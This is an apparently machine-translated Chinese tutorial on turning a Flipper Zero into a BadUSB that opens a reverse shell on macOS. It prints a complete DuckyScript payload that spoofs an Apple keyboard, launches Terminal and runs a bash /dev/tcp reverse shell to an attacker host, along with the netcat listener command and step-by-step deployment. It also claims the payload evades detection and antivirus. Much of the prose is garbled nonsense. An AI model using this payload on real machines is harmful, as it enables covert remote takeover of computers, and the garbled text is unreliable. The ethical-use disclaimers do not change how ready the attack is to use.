如何使用 Flipper Zero 作为 BadUSB 在 macOS 上获取反向 Shell

在我的 Ubuntu 服务管理器上操作 Flipper Zero、一家简洁明了的 12 行 DuckyScript 文系统文件和一家远程操作侦听器，我能够够在我仍然补修的最新信息 Ventura macOS 算出电脑上可以获得一家 shell。

在我的实验英文室区域中，我便用 Flipper Zero 当作侵入测式机械设备来测式我的功能器和卓面体统中的漏洞补丁。

Flipper Zero 是我们们最佳的选购的道德教育网络黑客器具，如果它展示数据了成千上万的可以选购的有效果环境下，具有着液晶屏选项卡选购器具，并应用进度表提示 来展示数据调查问卷。

这篇文就是个例子，表明怎么样去 将 Flipper Zero 作为什么是道德渗各种测试 BadUSB 环保设备各种怎么样去 不能变成了某些缺陷合理利用的范罪者。不能在您不赋予或没有权利应用的求算机器上应用它。此代码怎么用不懂会议室清空黑客攻击论文查重整体 (IDS)、黑客攻击抵抗整体 (IPS)、wifi网络论文查重整体、防炎墙或预防疾宏病毒 (AV) 軟件。

BadUSB 负载

Flipper Zero BadUSB 及及别的多少个 BadUSB 仪器操作用 DuckyScript 撰写的有效果阻抗。的简单化的按键精灵脚本語言，用作运行致使机械键盘赋予恶意攻击的击键。

Duckyscript Payloads 的一种特好的起至对比点是 Hak5 关方网站首页：

.在这里您可以找到使用 DuckScript 的示例和文档。

让我们写一些 DuckyScript

您也可用现有的角本，也也可学习成绩编排自已的角本。他们将进行比较简单的逐层训练向您风采展示如此在 macOS 确定机器上利于选择性 shell。

操作您最很喜欢的word文档编写器并显示这word文档。 macOS 锁定装置了 TextEdit 用执行程序，因为让我们将操作它。

ID 05ac:021e Apple:Keyboard

DELAY 1000

GUI SPACE

DELAY 200

STRING terminal

DELAY 200

ENTER

DELAY 1000

STRING bash -i >& /dev/tcp/10.10.10.157/4444 0>&1

DELAY 1000

ENTER

DELAY 1000

就本排练，咱们的不是需要对 DuckyScript 理解许多，之所以咱们的将预习一会儿咱们的的游戏脚本施用的几指令。咱们的现场上只施用了五其他的指令。

命令行	描叙
ID 05ac:021e Apple:机械键盘	这每行告诉他 macOS 我的 Flipper Zero 真实上是一种个 Apple 联想手机键盘。倘若您不应用这次去，macOS 会出现联想手机键盘设立助手下载会话框，这将以至于您的js失敗。
延缓	此强制性标识方法平台停留那段时候。这样小编不用以下延缓，按键精灵脚本将工作得太快而失敗。
画质面积	按 Apple Command 键和回车键拉开“Spotlight 搜”窗口最大化。
STRING 手持终端	在 Spotlight 搜寻任务栏中手机输入空字符数组“Terminal”
进行	按建盘上的 ENTER 或 Return 键。键后 ENTER 键后，macOS 通电末端工具栏 (/Applications/Utilities/Terminal)
空格符串 bash -i >& /dev/tcp/10.10.10.157/4444 0>&1	此强制性将文档设置末端任务栏图标，该任务栏图标确立到 Netcat 服务于培训器的接触，该服务于培训器侦听网口 4444 上的 10.10.10.157

将 IP 地址10.10.10.157和端口4444更改为您服务器的 IP 地址和端口。

将此文件作为rev_shell_macos.txt保存到您的磁盘。 Flipper Zero 上的badusb目录下没有子目录组织，因此如果您为不同的操作系统使用多个有效载荷，请使用对您有意义的命名约定，以便您知道它的作用。

安装 qflipper 应用程序

假设您一直不会有有施工 qflipper 用设备，请转到中国官方网站 Flipper 零内容更新换代网站选项卡并取舍实用作您的基本操作设备的施工设备。该网站选项卡是固件内容更新换代网站选项卡，但上端是施工 qflipper 用设备的下载链接。

是以采广泛用于您的实操系统的证明组装 qflipper 应该用方式。

将 Duckyscript 放到脚蹼零上

打开浏览器 qflipper 应用源程序并选购以红颜色显著表明的系统根目录应用图标。

选择并双击SD 卡图标以查看内容。

找到我们之前创建的rev_shell_macos.txt文件并将其拖到badusb文件夹中。

文件资料重复完成任务后，从计算方法机中取下 Flipper Zero。

等待反向 Shell

Flipper Zero BadUSB 已需备就绪，能否运行了。但第一方面，大家可以在大家的保障质量器上选用大家的无线侦听器。在大家的 Ubuntu 保障质量器上，运行下列指令无法 Netcat 侦听器：

$ nc -nlvp 4444

下表列成了下令的相关性分析。都，不但守候传播接连外，您是真的不需求掌握利用此下令发生的了哪些。

系统命令	工具栏
数控	网猫命令提示符
-nlvp	( n ) 无 DNS 解析，( l ) 侦听传入连接，( v ) 详细输出，( p ) 端口
4444	要侦听的端口号号

现下我门大家的 Netcat 侦听器已需要准备好了并在等待传来对接，我门大家行再继续采取 Flipper Zero BadUSB 主动攻击。

启动 BadUSB 反向 Shell

困难的部分已经完成。 Flipper Zero BadUSB reverse_shell_macos.txt文件已写入，移动到 Flipper Zero，Netcat 侦听器正在等待连接。

找 Bad USB 点菜单并取舍 Run 按钮图片。临时要将 Flipper Zero 无线连接方式到核算机。 Flipper Zero 会在应该无线连接方式的设备时告知书您。

导航到我们在上一步中复制的 DuckyScript 文件。如果您没有看到该文件，那么您将它复制到了错误的目录。选择rev_shell_macos并单击运行按钮。

当您看到连接到 USB警报时，您可以将 Flipper Zero 连接到 iMac 或 MacBook 的 USB 端口。单击运行按钮。

您能否在主窗户中观察 BadUSB 代码的进展。已经工作状态提高 100%，阻抗就达到了，您能否移除 Flipper Zero。

要您目前在查看 iMac 的计算出来机展示器，您会在完成 DuckyScript 时看出该xss漏洞。我们公司 Ubuntu 业务器上的 Netcat 侦听器展示非常成功表单提交的然而。

控制您的计算机

您如今可能依据反方向 shell 调控 macOS 换算机。在 BSD Linux 新版本上运作，您可能选择 Unix 指令行交通工具和 BASH shell，就似的您坐 iMac 的数学电脑键盘两个样。

您可以使用whoami 、 pwd 、 ls或cd等常规 Linux 命令来导航文件系统和操作操作系统。

下一步

如今的您已然介绍 Flipper Zero 是怎样的当作 BadUSB 设施启动，您应该撰写个人的脚本制作。安全使用 Hak5 公交线路或经过 Google 关注可的比较多的 DuckyScript GitHub 储存库中之一当作您个人的 Duckyscript 文件下载的起点中文网。

被法律认可符合道德教育地运作。在您具备或准许利用的机 上利用此用具。